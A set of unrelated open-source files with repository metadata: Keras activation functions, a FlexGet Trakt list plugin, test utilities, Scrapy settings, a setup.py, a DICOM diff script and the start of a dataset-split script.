"ref": "refs/heads/master",
"path": "IORobot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "856"
},
{
"name": "Batchfile",
"bytes": "679"
},
{
"name": "C",
"bytes": "301473"
},
{
"name": "C++",
"bytes": "539991"
},
{
"name": "Gnuplot",
"bytes": "1186"
},
{
"name": "HTML",
"bytes": "267964"
},
{
"name": "Makefile",
"bytes": "13218"
},
{
"name": "Objective-C",
"bytes": "15879"
},
{
"name": "Perl",
"bytes": "349282"
},
{
"name": "Python",
"bytes": "422489"
},
{
"name": "Shell",
"bytes": "6666"
},
{
"name": "TeX",
"bytes": "14704"
}
],
"symlink_target": ""
}
|
"""Built-in activation functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import keras_export
# b/123041942
# In TF 2.x, if the `tf.nn.softmax` is used as an activation function in Keras
# layers, it gets serialized as 'softmax_v2' instead of 'softmax' as the
# internal method name is returned in serialization. This results in errors in
# model exporting and loading as Keras can't find any activation function with
# the name of `softmax_v2`.
# This dict maps the activation function name from its v2 version to its
# canonical name.
_TF_ACTIVATIONS_V2 = {
'softmax_v2': 'softmax',
}
@keras_export('keras.activations.softmax')
@dispatch.add_dispatch_support
def softmax(x, axis=-1):
"""Softmax converts a real vector to a vector of categorical probabilities.
The elements of the output vector are in range (0, 1) and sum to 1.
Each vector is handled independently. The `axis` argument sets which axis
of the input the function is applied along.
Softmax is often used as the activation for the last
layer of a classification network because the result could be interpreted as
a probability distribution.
The softmax of each vector x is computed as
`exp(x) / tf.reduce_sum(exp(x))`.
The input values in are the log-odds of the resulting probability.
Arguments:
x : Input tensor.
axis: Integer, axis along which the softmax normalization is applied.
Returns:
Tensor, output of softmax transformation (all values are non-negative
and sum to 1).
Raises:
ValueError: In case `dim(x) == 1`.
"""
ndim = K.ndim(x)
if ndim == 2:
return nn.softmax(x)
elif ndim > 2:
e = math_ops.exp(x - math_ops.reduce_max(x, axis=axis, keepdims=True))
s = math_ops.reduce_sum(e, axis=axis, keepdims=True)
return e / s
else:
raise ValueError('Cannot apply softmax to a tensor that is 1D. '
'Received input: %s' % (x,))
@keras_export('keras.activations.elu')
@dispatch.add_dispatch_support
def elu(x, alpha=1.0):
"""Exponential Linear Unit.
The exponential linear unit (ELU) with `alpha > 0` is:
`x` if `x > 0` and
`alpha * (exp(x) - 1)` if `x < 0`
The ELU hyperparameter `alpha` controls the value to which an
ELU saturates for negative net inputs. ELUs diminish the
vanishing gradient effect.
ELUs have negative values which pushes the mean of the activations
closer to zero.
Mean activations that are closer to zero enable faster learning as they
bring the gradient closer to the natural gradient.
ELUs saturate to a negative value when the argument gets smaller.
Saturation means a small derivative which decreases the variation
and the information that is propagated to the next layer.
Example Usage:
>>> import tensorflow as tf
>>> model = tf.keras.Sequential()
>>> model.add(tf.keras.layers.Conv2D(32, (3, 3), activation='elu',
... input_shape=(28, 28, 1)))
>>> model.add(tf.keras.layers.MaxPooling2D((2, 2)))
>>> model.add(tf.keras.layers.Conv2D(64, (3, 3), activation='elu'))
>>> model.add(tf.keras.layers.MaxPooling2D((2, 2)))
>>> model.add(tf.keras.layers.Conv2D(64, (3, 3), activation='elu'))
<tensorflow.python.keras.engine.sequential.Sequential object ...>
Arguments:
x: Input tensor.
alpha: A scalar, slope of negative section. `alpha` controls the value to
which an ELU saturates for negative net inputs.
Returns:
The exponential linear unit (ELU) activation function: `x` if `x > 0` and
`alpha * (exp(x) - 1)` if `x < 0`.
Reference:
[Fast and Accurate Deep Network Learning by Exponential Linear Units
(ELUs) (Clevert et al, 2016)](https://arxiv.org/abs/1511.07289)
"""
return K.elu(x, alpha)
@keras_export('keras.activations.selu')
@dispatch.add_dispatch_support
def selu(x):
"""Scaled Exponential Linear Unit (SELU).
The Scaled Exponential Linear Unit (SELU) activation function is defined as:
- `if x > 0: return scale * x`
- `if x < 0: return scale * alpha * (exp(x) - 1)`
where `alpha` and `scale` are pre-defined constants
(`alpha=1.67326324` and `scale=1.05070098`).
Basically, the SELU activation function multiplies `scale` (> 1) with the
output of the `tf.keras.activations.elu` function to ensure a slope larger
than one for positive inputs.
The values of `alpha` and `scale` are
chosen so that the mean and variance of the inputs are preserved
between two consecutive layers as long as the weights are initialized
correctly (see `tf.keras.initializers.LecunNormal` initializer)
and the number of input units is "large enough"
(see reference paper for more information).
Example Usage:
>>> num_classes = 10 # 10-class problem
>>> model = tf.keras.Sequential()
>>> model.add(tf.keras.layers.Dense(64, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(32, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(16, kernel_initializer='lecun_normal',
... activation='selu'))
>>> model.add(tf.keras.layers.Dense(num_classes, activation='softmax'))
Arguments:
x: A tensor or variable to compute the activation function for.
Returns:
The scaled exponential unit activation: `scale * elu(x, alpha)`.
Notes:
- To be used together with the
`tf.keras.initializers.LecunNormal` initializer.
- To be used together with the dropout variant
`tf.keras.layers.AlphaDropout` (not regular dropout).
References:
- [Klambauer et al., 2017](https://arxiv.org/abs/1706.02515)
"""
return nn.selu(x)
@keras_export('keras.activations.softplus')
@dispatch.add_dispatch_support
def softplus(x):
"""Softplus activation function, `softplus(x) = log(exp(x) + 1)`.
Example Usage:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.softplus(a)
>>> b.numpy()
array([2.0611537e-09, 3.1326166e-01, 6.9314718e-01, 1.3132616e+00,
2.0000000e+01], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The softplus activation: `log(exp(x) + 1)`.
"""
return nn.softplus(x)
@keras_export('keras.activations.softsign')
@dispatch.add_dispatch_support
def softsign(x):
"""Softsign activation function, `softsign(x) = x / (abs(x) + 1)`.
Example Usage:
>>> a = tf.constant([-1.0, 0.0, 1.0], dtype = tf.float32)
>>> b = tf.keras.activations.softsign(a)
>>> b.numpy()
array([-0.5, 0. , 0.5], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The softsign activation: `x / (abs(x) + 1)`.
"""
return nn.softsign(x)
@keras_export('keras.activations.swish')
@dispatch.add_dispatch_support
def swish(x):
"""Swish activation function, `swish(x) = x * sigmoid(x)`.
Swish activation function which returns `x*sigmoid(x)`.
It is a smooth, non-monotonic function that consistently matches
or outperforms ReLU on deep networks, it is unbounded above and
bounded below.
Example Usage:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.swish(a)
>>> b.numpy()
array([-4.1223075e-08, -2.6894143e-01, 0.0000000e+00, 7.3105860e-01,
2.0000000e+01], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The swish activation applied to `x` (see reference paper for details).
Reference:
- [Ramachandran et al., 2017](https://arxiv.org/abs/1710.05941)
"""
return nn.swish(x)
@keras_export('keras.activations.relu')
@dispatch.add_dispatch_support
def relu(x, alpha=0., max_value=None, threshold=0):
"""Applies the rectified linear unit activation function.
With default values, this returns the standard ReLU activation:
`max(x, 0)`, the element-wise maximum of 0 and the input tensor.
Modifying default parameters allows you to use non-zero thresholds,
change the max value of the activation,
and to use a non-zero multiple of the input for values below the threshold.
For example:
>>> foo = tf.constant([-10, -5, 0.0, 5, 10], dtype = tf.float32)
>>> tf.keras.activations.relu(foo).numpy()
array([ 0., 0., 0., 5., 10.], dtype=float32)
>>> tf.keras.activations.relu(foo, alpha=0.5).numpy()
array([-5. , -2.5, 0. , 5. , 10. ], dtype=float32)
>>> tf.keras.activations.relu(foo, max_value=5).numpy()
array([0., 0., 0., 5., 5.], dtype=float32)
>>> tf.keras.activations.relu(foo, threshold=5).numpy()
array([-0., -0., 0., 0., 10.], dtype=float32)
Arguments:
x: Input `tensor` or `variable`.
alpha: A `float` that governs the slope for values lower than the
threshold.
max_value: A `float` that sets the saturation threshold (the largest value
the function will return).
threshold: A `float` giving the threshold value of the activation function
below which values will be damped or set to zero.
Returns:
A `Tensor` representing the input tensor,
transformed by the relu activation function.
Tensor will be of the same shape and dtype of input `x`.
"""
return K.relu(x, alpha=alpha, max_value=max_value, threshold=threshold)
@keras_export('keras.activations.gelu', v1=[])
@dispatch.add_dispatch_support
def gelu(x, approximate=False):
"""Applies the Gaussian error linear unit (GELU) activation function.
Gaussian error linear unit (GELU) computes
`x * P(X <= x)`, where `P(X) ~ N(0, 1)`.
The (GELU) nonlinearity weights inputs by their value, rather than gates
inputs by their sign as in ReLU.
For example:
>>> x = tf.constant([-3.0, -1.0, 0.0, 1.0, 3.0], dtype=tf.float32)
>>> y = tf.keras.activations.gelu(x)
>>> y.numpy()
array([-0.00404951, -0.15865529, 0. , 0.8413447 , 2.9959507 ],
dtype=float32)
>>> y = tf.keras.activations.gelu(x, approximate=True)
>>> y.numpy()
array([-0.00363752, -0.15880796, 0. , 0.841192 , 2.9963627 ],
dtype=float32)
Arguments:
x: Input tensor.
approximate: A `bool`, whether to enable approximation.
Returns:
The gaussian error linear activation:
`0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))`
if `approximate` is `True` or
`x * P(X <= x) = 0.5 * x * (1 + erf(x / sqrt(2)))`,
where `P(X) ~ N(0, 1)`,
if `approximate` is `False`.
Reference:
- [Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415)
"""
return nn.gelu(x, approximate)
@keras_export('keras.activations.tanh')
@dispatch.add_dispatch_support
def tanh(x):
"""Hyperbolic tangent activation function.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.tanh(a)
>>> b.numpy()
array([-0.9950547, -0.7615942, 0., 0.7615942, 0.9950547], dtype=float32)
Arguments:
x: Input tensor.
Returns:
Tensor of same shape and dtype of input `x`, with tanh activation:
`tanh(x) = sinh(x)/cosh(x) = ((exp(x) - exp(-x))/(exp(x) + exp(-x)))`.
"""
return nn.tanh(x)
@keras_export('keras.activations.sigmoid')
@dispatch.add_dispatch_support
def sigmoid(x):
"""Sigmoid activation function, `sigmoid(x) = 1 / (1 + exp(-x))`.
Applies the sigmoid activation function. For small values (<-5),
`sigmoid` returns a value close to zero, and for large values (>5)
the result of the function gets close to 1.
Sigmoid is equivalent to a 2-element Softmax, where the second element is
assumed to be zero. The sigmoid function always returns a value between
0 and 1.
For example:
>>> a = tf.constant([-20, -1.0, 0.0, 1.0, 20], dtype = tf.float32)
>>> b = tf.keras.activations.sigmoid(a)
>>> b.numpy()
array([2.0611537e-09, 2.6894143e-01, 5.0000000e-01, 7.3105860e-01,
1.0000000e+00], dtype=float32)
Arguments:
x: Input tensor.
Returns:
Tensor with the sigmoid activation: `1 / (1 + exp(-x))`.
"""
return nn.sigmoid(x)
@keras_export('keras.activations.exponential')
@dispatch.add_dispatch_support
def exponential(x):
"""Exponential activation function.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.exponential(a)
>>> b.numpy()
array([0.04978707, 0.36787945, 1., 2.7182817 , 20.085537], dtype=float32)
Arguments:
x: Input tensor.
Returns:
Tensor with exponential activation: `exp(x)`.
"""
return math_ops.exp(x)
@keras_export('keras.activations.hard_sigmoid')
@dispatch.add_dispatch_support
def hard_sigmoid(x):
"""Hard sigmoid activation function.
A faster approximation of the sigmoid activation.
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.hard_sigmoid(a)
>>> b.numpy()
array([0. , 0.3, 0.5, 0.7, 1. ], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The hard sigmoid activation, defined as:
- `if x < -2.5: return 0`
- `if x > 2.5: return 1`
- `if -2.5 <= x <= 2.5: return 0.2 * x + 0.5`
"""
return K.hard_sigmoid(x)
@keras_export('keras.activations.linear')
@dispatch.add_dispatch_support
def linear(x):
"""Linear activation function (pass-through).
For example:
>>> a = tf.constant([-3.0,-1.0, 0.0,1.0,3.0], dtype = tf.float32)
>>> b = tf.keras.activations.linear(a)
>>> b.numpy()
array([-3., -1., 0., 1., 3.], dtype=float32)
Arguments:
x: Input tensor.
Returns:
The input, unmodified.
"""
return x
@keras_export('keras.activations.serialize')
@dispatch.add_dispatch_support
def serialize(activation):
"""Returns the string identifier of an activation function.
Arguments:
activation : Function object.
Returns:
String denoting the name attribute of the input function
For example:
>>> tf.keras.activations.serialize(tf.keras.activations.tanh)
'tanh'
>>> tf.keras.activations.serialize(tf.keras.activations.sigmoid)
'sigmoid'
>>> tf.keras.activations.serialize('abcd')
Traceback (most recent call last):
...
ValueError: ('Cannot serialize', 'abcd')
Raises:
ValueError: The input function is not a valid one.
"""
if (hasattr(activation, '__name__') and
activation.__name__ in _TF_ACTIVATIONS_V2):
return _TF_ACTIVATIONS_V2[activation.__name__]
return serialize_keras_object(activation)
@keras_export('keras.activations.deserialize')
@dispatch.add_dispatch_support
def deserialize(name, custom_objects=None):
"""Returns activation function given a string identifier.
Args:
name: The name of the activation function.
custom_objects: Optional `{function_name: function_obj}`
dictionary listing user-provided activation functions.
Returns:
Corresponding activation function.
For example:
>>> tf.keras.activations.deserialize('linear')
<function linear at 0x1239596a8>
>>> tf.keras.activations.deserialize('sigmoid')
<function sigmoid at 0x123959510>
>>> tf.keras.activations.deserialize('abcd')
Traceback (most recent call last):
...
ValueError: Unknown activation function:abcd
Raises:
ValueError: `Unknown activation function` if the input string does not
denote any defined Tensorflow activation function.
"""
return deserialize_keras_object(
name,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name='activation function')
@keras_export('keras.activations.get')
@dispatch.add_dispatch_support
def get(identifier):
"""Returns function.
Arguments:
identifier: Function or string
Returns:
Function corresponding to the input string or input function.
For example:
>>> tf.keras.activations.get('softmax')
<function softmax at 0x1222a3d90>
>>> tf.keras.activations.get(tf.keras.activations.softmax)
<function softmax at 0x1222a3d90>
>>> tf.keras.activations.get(None)
<function linear at 0x1239596a8>
>>> tf.keras.activations.get(abs)
<built-in function abs>
>>> tf.keras.activations.get('abcd')
Traceback (most recent call last):
...
ValueError: Unknown activation function:abcd
Raises:
ValueError: Input is an unknown function or string, i.e., the input does
not denote any defined function.
"""
if identifier is None:
return linear
if isinstance(identifier, six.string_types):
identifier = str(identifier)
return deserialize(identifier)
elif isinstance(identifier, dict):
return deserialize(identifier)
elif callable(identifier):
return identifier
else:
raise TypeError(
'Could not interpret activation function identifier: {}'.format(
identifier))
|
{
"content_hash": "517ecc950b96050213ab63a92fdb8d06",
"timestamp": "",
"source": "github",
"line_count": 560,
"max_line_length": 80,
"avg_line_length": 30.76607142857143,
"alnum_prop": 0.6702072087759011,
"repo_name": "aldian/tensorflow",
"id": "119851f4e133d74b25595b359ac535592539029d",
"size": "17918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/activations.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8458"
},
{
"name": "C",
"bytes": "201402"
},
{
"name": "C++",
"bytes": "29667924"
},
{
"name": "CMake",
"bytes": "647100"
},
{
"name": "Go",
"bytes": "976514"
},
{
"name": "Java",
"bytes": "412117"
},
{
"name": "Jupyter Notebook",
"bytes": "1833675"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "38128"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Perl",
"bytes": "6715"
},
{
"name": "Protocol Buffer",
"bytes": "275733"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "26424665"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "373109"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
import logging
import re
from requests import RequestException
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.cached_input import cached
from flexget.utils.trakt import get_api_url, get_session, make_list_slug
log = logging.getLogger('trakt_list')
field_maps = {
'movie': {
'title': lambda i: '%s (%s)' % (i['movie']['title'], i['movie']['year']),
'movie_name': 'movie.title',
'movie_year': 'movie.year',
'imdb_id': 'movie.ids.imdb',
'tmdb_id': 'movie.ids.tmdb',
'trakt_movie_id': 'movie.ids.trakt',
'trakt_movie_slug': 'movie.ids.slug'
},
'show': {
'title': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'series_name': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'imdb_id': 'show.ids.imdb',
'tvdb_id': 'show.ids.tvdb',
'tvrage_id': 'show.ids.tvrage',
'tmdb_id': 'show.ids.tmdb',
'trakt_show_id': 'show.ids.trakt',
'trakt_slug': 'show.ids.slug'
},
'episode': {
'title': lambda i: '%s (%s) S%02dE%02d %s' % (i['show']['title'], i['show']['year'], i['episode']['season'],
i['episode']['number'], i['episode']['title']),
'series_name': lambda i: '%s (%s)' % (i['show']['title'], i['show']['year']),
'series_season': 'episode.season',
'series_episode': 'episode.number',
'series_id': lambda i: 'S%02dE%02d' % (i['episode']['season'], i['episode']['number']),
'imdb_id': 'show.ids.imdb',
'tvdb_id': 'show.ids.tvdb',
'tvrage_id': 'show.ids.tvrage',
'trakt_episode_id': 'episode.ids.trakt',
'trakt_show_id': 'show.ids.trakt',
'trakt_show_slug': 'show.ids.slug'
}
}
class TraktList(object):
"""Creates an entry for each item in your trakt list.
Syntax:
trakt_list:
username: <value>
password: <value>
type: <shows|movies|episodes>
list: <collection|watchlist|watched|custom list name>
strip_dates: <yes|no>
Options username, type and list are required. password is required for private lists.
"""
schema = {
'type': 'object',
'properties': {
'username': {'type': 'string'},
'password': {'type': 'string'},
'type': {'type': 'string', 'enum': ['shows', 'movies', 'episodes']},
'list': {'type': 'string'},
'strip_dates': {'type': 'boolean', 'default': False}
},
'required': ['username', 'type', 'list'],
'additionalProperties': False,
'not': {
'properties': {
'type': {'enum': ['episodes']},
'list': {'enum': ['collection', 'watched']}
}
},
'error_not': '`collection` and `watched` lists do not support `episodes` type'
}
@cached('trakt_list', persist='2 hours')
def on_task_input(self, task, config):
session = get_session(config['username'], config.get('password'))
endpoint = ['users', config['username']]
if config['list'] in ['collection', 'watchlist', 'watched']:
endpoint += (config['list'], config['type'])
else:
endpoint += ('lists', make_list_slug(config['list']), 'items')
log.verbose('Retrieving `%s` list `%s`' % (config['type'], config['list']))
try:
result = session.get(get_api_url(endpoint))
try:
data = result.json()
except ValueError:
log.debug('Could not decode json from response: %s', result.text)
raise plugin.PluginError('Error getting list from trakt.')
except RequestException as e:
raise plugin.PluginError('Could not retrieve list from trakt (%s)' % e.args[0])
if not data:
log.warning('No data returned from trakt for %s list %s.' % (config['type'], config['list']))
return
entries = []
list_type = (config['type']).rstrip('s')
for item in data:
# Collection and watched lists don't return 'type' along with the items (right now)
if 'type' in item and item['type'] != list_type:
log.debug('Skipping %s because it is not a %s' % (item[item['type']].get('title', 'unknown'), list_type))
continue
if not item[list_type]['title']:
# There seems to be some bad shows sometimes in lists with no titles. Skip them.
log.warning('Item in trakt list does not appear to have a title, skipping.')
continue
entry = Entry()
if list_type == 'episode':
entry['url'] = 'http://trakt.tv/shows/%s/seasons/%s/episodes/%s' % (
item['show']['ids']['slug'], item['episode']['season'], item['episode']['number'])
else:
entry['url'] = 'http://trakt.tv/%s/%s' % (list_type, item[list_type]['ids'].get('slug'))
entry.update_using_map(field_maps[list_type], item)
if entry.isvalid():
if config.get('strip_dates'):
# Remove year from end of name if present
entry['title'] = re.sub(r'\s+\(\d{4}\)$', '', entry['title'])
entries.append(entry)
else:
log.debug('Invalid entry created? %s' % entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(TraktList, 'trakt_list', api_ver=2)
|
{
"content_hash": "bbe2258c8a47701ca1b484a4749c9e0a",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 121,
"avg_line_length": 39.73426573426573,
"alnum_prop": 0.5323829637451601,
"repo_name": "v17al/Flexget",
"id": "e38e678b3978feae1b581dd83074ae7dcae42395",
"size": "5682",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "flexget/plugins/input/trakt_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2021713"
}
],
"symlink_target": ""
}
|
import os, pytest
import subprocess
from quarkc import _metadata
def is_excluded_file(name):
if "quarkc/lib/" in name or name == "reflector":
return True
else:
return False
def is_runtime(path):
return "quark_" in path and "_runtime" in path
def filter_builtin(content):
"""Filter out lines that shouldn't be compared in tests."""
if content is None:
return None
lines = content.split("\n")
result = []
skipping = False
for line in lines:
# Checked-in test comparison packaging hardcodes version 0.0.1 since we
# have different versions of Quark stdlib on each release:
quark_dependency = (('"quark": "0.0.1"' in line) or
('"quark": "{}"'.format(_metadata.__version__) in line) or
("spec.add_runtime_dependency 'quark'" in line) or
("<version>0.0.1</version>" in line) or
("<version>{}</version>".format(_metadata.__version__) in line) or
("install_requires" in line and "quark==" in line))
if "BEGIN_BUILTIN" in line:
skipping = True
if not skipping and not quark_dependency:
result.append(line)
if "END_BUILTIN" in line:
skipping = False
return "\n".join(result)
def is_valid_change(path, content, expected):
if is_runtime(path): return True
return filter_builtin(content) == filter_builtin(expected)
def check_file(path, content):
try:
with open(path) as fd:
expected = fd.read()
except IOError:
expected = None
if expected != content:
dir = os.path.dirname(path)
if not os.path.exists(dir):
os.makedirs(dir)
if is_valid_change(path, content, expected):
with open(path, "wb") as fd: fd.write(content)
return content
else:
with open(path + ".cmp", "wb") as fd: fd.write(content)
return expected
def assert_file(path, content):
expected = check_file(path, content)
assert content == expected
def maybe_xfail(code, ext=None):
if "xfail" in code and "xfail:" not in code:
pytest.xfail()
if ext and ("xfail:%s"%ext) in code:
pytest.xfail()
def get_git_top(start="."):
try:
git_top = subprocess.check_output("git rev-parse --show-toplevel".split(), cwd=start).strip()
except (OSError, subprocess.CalledProcessError):
raise ValueError("Not a git repository: %r" % start)
return git_top
|
{
"content_hash": "2af6224f72bb24718b71eaa9c1637538",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 101,
"avg_line_length": 33.8421052631579,
"alnum_prop": 0.5847589424572317,
"repo_name": "datawire/quark",
"id": "8d237008d6b731eacb50316ae637bd645f6f32bb",
"size": "3167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quarkc/test/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1802"
},
{
"name": "HTML",
"bytes": "8346"
},
{
"name": "Java",
"bytes": "381125"
},
{
"name": "JavaScript",
"bytes": "501785"
},
{
"name": "Python",
"bytes": "643417"
},
{
"name": "Ruby",
"bytes": "370423"
},
{
"name": "Shell",
"bytes": "21479"
}
],
"symlink_target": ""
}
|
BOT_NAME = 'vagascrawler'
SPIDER_MODULES = ['vagascrawler.spiders']
NEWSPIDER_MODULE = 'vagascrawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'vagascrawler (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'vagascrawler.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'vagascrawler.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'vagascrawler.pipelines.RethinkdbPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
#RethinkDB configuration
#RDB_HOST="localhost"
#RDB_PORT=29015
#RDB_DATABASE="vagascrawler"
|
{
"content_hash": "fc1175a3dd0716b5dfed16ef1c9fb7bb",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 109,
"avg_line_length": 34.10126582278481,
"alnum_prop": 0.781365998515219,
"repo_name": "berlotto/openjobs-scraper",
"id": "7dce27b29ac889677a50356d86e7064b612a76bd",
"size": "3131",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vagascrawler/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7011"
}
],
"symlink_target": ""
}
|
__author__ = "Christian Schwede <info@cschwede.de>"
name = 'swquota'
entry_point = '%s.middleware:filter_factory' % (name)
version = '0.1'
from setuptools import setup, find_packages
setup(
name=name,
version=version,
description='Swift quota middleware',
license='Apache License (2.0)',
author='OpenStack, LLC.',
author_email='info@cschwede.de',
url='https://github.com/cschwede/%s' % (name),
packages=find_packages(),
test_suite='nose.collector',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.6',
'Environment :: No Input/Output (Daemon)'],
install_requires=['swift'],
entry_points={
'paste.filter_factory': ['swquota=%s' % entry_point]
},
scripts=['bin/swquota-tool']
)
|
{
"content_hash": "e249ecebd5078649bc649eaa71853deb",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 61,
"avg_line_length": 31.379310344827587,
"alnum_prop": 0.6241758241758242,
"repo_name": "garvenshen/swquota",
"id": "825b3a54bb268f8a876059daafa62ca123577632",
"size": "936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""Show the difference between two dicom files.
"""
# Copyright (c) 2008-2012 Darcy Mason
# This file is part of pydicom, relased under an MIT license.
# See the file license.txt included with this distribution, also
# available at http://pydicom.googlecode.com
from __future__ import print_function
usage = """
Usage:
python DicomDiff.py file1 file2
Results printed in python difflib form - indicated by start of each line:
' ' blank means lines the same
'-' means in file1 but "removed" in file2
'+' means not in file1, but "added" in file2
('?' lines from difflib removed - no use here)
"""
import sys
import dicom
import difflib
# only used as a script
if len(sys.argv) != 3:
print(usage)
sys.exit()
datasets = dicom.read_file(sys.argv[1]), \
dicom.read_file(sys.argv[2])
# diflib compare functions require a list of lines, each terminated with newline character
# massage the string representation of each dicom dataset into this form:
rep = []
for dataset in datasets:
lines = str(dataset).split("\n")
lines = [line + "\n" for line in lines] # add the newline to end
rep.append(lines)
diff = difflib.Differ()
for line in diff.compare(rep[0], rep[1]):
if line[0] != "?":
print(line)
|
{
"content_hash": "b6fa99eacea7eb022ffd74f2f3f62f74",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 90,
"avg_line_length": 27.711111111111112,
"alnum_prop": 0.6920609462710505,
"repo_name": "njvack/yadda",
"id": "2dd91c64ada251e3442edbc9c607482e247166b2",
"size": "1262",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "dicom/examples/DicomDiff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1729924"
},
{
"name": "Shell",
"bytes": "1250"
}
],
"symlink_target": ""
}
|
from os import path, pardir
import sys
import logging
# not used in this stub but often useful for finding various files
PROJECT_ROOT_DIRPATH = path.join(path.dirname(__file__), pardir, pardir)
sys.path.append(PROJECT_ROOT_DIRPATH)
# Third-party modules
import click
from dotenv import find_dotenv, load_dotenv
# Hand-made modules
from src.models.split import ValidationSplitHandler
TRAIN_FILEPATH_PREFIX = path.join(
PROJECT_ROOT_DIRPATH, "data/interim/dataset.train_X_y"
)
TRAIN_FILEPATH_SUFFIX = "yonekurayama.blp"
LOCATIONS = (
"ukishima",
"ougishima",
"yonekurayama"
)
@click.command()
